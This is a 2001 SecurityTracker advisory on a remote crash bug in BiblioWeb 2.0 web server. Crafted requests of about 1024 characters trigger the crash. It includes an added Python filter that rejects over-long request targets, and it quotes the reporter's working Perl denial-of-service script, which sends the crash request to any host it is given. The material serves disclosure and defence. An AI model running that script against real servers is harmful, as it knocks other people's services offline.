SecurityTracker.com
Category:  Application (Web Server/CGI)  >  BiblioWeb
Vendors:  CG Information
BiblioWeb Server Can Be Crashed By a Remote User Sending a Long URL
Date:  Jun 13 2001 19:06 (UTC/GMT)
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): version 2.0
Description:  A vulnerability has been reported in the web server component of BiblioWeb that allows remote users to cause the web server to crash.

By sending a GET request with approximately 1024 characters as the target of the request, a remote user can cause the web server to crash.

A demonstration exploit Perl script is included in the Source Message.

Impact:  A remote user can cause the web server to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.biblioscape.com/biblioweb.htm
Cause:  Boundary error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)
Reported By:  alt3kx_h3z@hotmail.com
Message History:   None.
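
With no vendor fix available at the time of the entry, one compensating control is to reject over-long request targets before they reach the web server. The following is an added example, not part of the advisory or the source message; the function name screen_request and the limits MAX_TARGET and MAX_LINE are assumptions chosen for illustration, and the sample requests are constructed.

```python
# Added example (not from the advisory): screen the HTTP request line for an
# over-long target, as a filtering proxy in front of a fragile server might.
from typing import NamedTuple

MAX_TARGET = 512   # assumption: well below the ~1024 characters in the advisory
MAX_LINE = 8192    # assumption: hard cap on bytes examined for the request line

class Verdict(NamedTuple):
    allow: bool
    status: int      # HTTP status the filter would answer with
    reason: str
    target_len: int

def screen_request(raw: bytes) -> Verdict:
    """Classify a raw HTTP request by the length and shape of its first line."""
    head = raw[:MAX_LINE]
    end = head.find(b"\n")
    if end == -1:
        # No line terminator inside the cap: oversized or still incomplete.
        if len(raw) >= MAX_LINE:
            return Verdict(False, 414, "request line exceeds cap", len(head))
        return Verdict(False, 400, "incomplete request line", len(head))
    parts = head[:end].rstrip(b"\r").split(b" ")
    if len(parts) < 2 or not parts[0].isalpha() or not parts[1]:
        return Verdict(False, 400, "malformed request line", 0)
    target = parts[1]
    if len(target) > MAX_TARGET:
        return Verdict(False, 414, "request target too long", len(target))
    # Require exactly METHOD TARGET VERSION (HTTP/0.9 simple requests are refused).
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return Verdict(False, 400, "bad or missing HTTP version", len(target))
    return Verdict(True, 200, "ok", len(target))

# Constructed samples: an ordinary request, one matching the advisory's
# description (about 1024 characters as the target), and a bad version token.
SAMPLES = {
    "normal": b"GET /search?q=smith HTTP/1.0\r\n\r\n",
    "long_target": b"GET /" + b"A" * 1024 + b" HTTP/1.0\r\n\r\n",
    "bad_version": b"GET /index.htm /HTTP/1.0\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, screen_request(raw))
```

Rejections with status 414 are also worth logging with the source address, since a crashed backend may leave no access-log entry of its own.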


 Source Message Contents

Date:  Wed, 13 Jun 2001 00:05:28 -0400
From:  alt3kx_h3z@hotmail.com
Subject:  BiblioWeb vulnerability

 

BiblioWeb version 2.0

Exploit:

#!/usr/bin/perl

system ("clear");

print "#################################################################\n";
print "#								\n";
print "#								\n";
print "# Simple Denial of Service against the Biblioweb Server		\n";
print "# Reference http://www.biblioscape.com				\n";
print "# Based info joetesta\@hushmail.com 	 			\n";
print "# 		 						\n";
print "#		 						\n";
print "# Author: alt3kx! alt3kx\@ <raza-mexicana.org> 			\n";
print "#								\n";
print "# 		 						\n";
print "# 		   www.raza-mexicana.org			\n";


use Getopt::Std;
use Socket;

getopts('h:', \%args);
if(!defined($args{h})){&usage;}

($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

$def = "A";
$num = "1024";
$data .= $def x $num;
$serv = $args{h};
$port = 80;
$buf = "GET /$data /HTTP/1.0\r\n\r\n";


$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";


print("\nData has been successfully sent to $serv\n\n");

sub usage {die("\n\nUsage: perl -x $0 -h <hostname>\n\n");}


 



Copyright 2001, SecurityGlobal.net LLC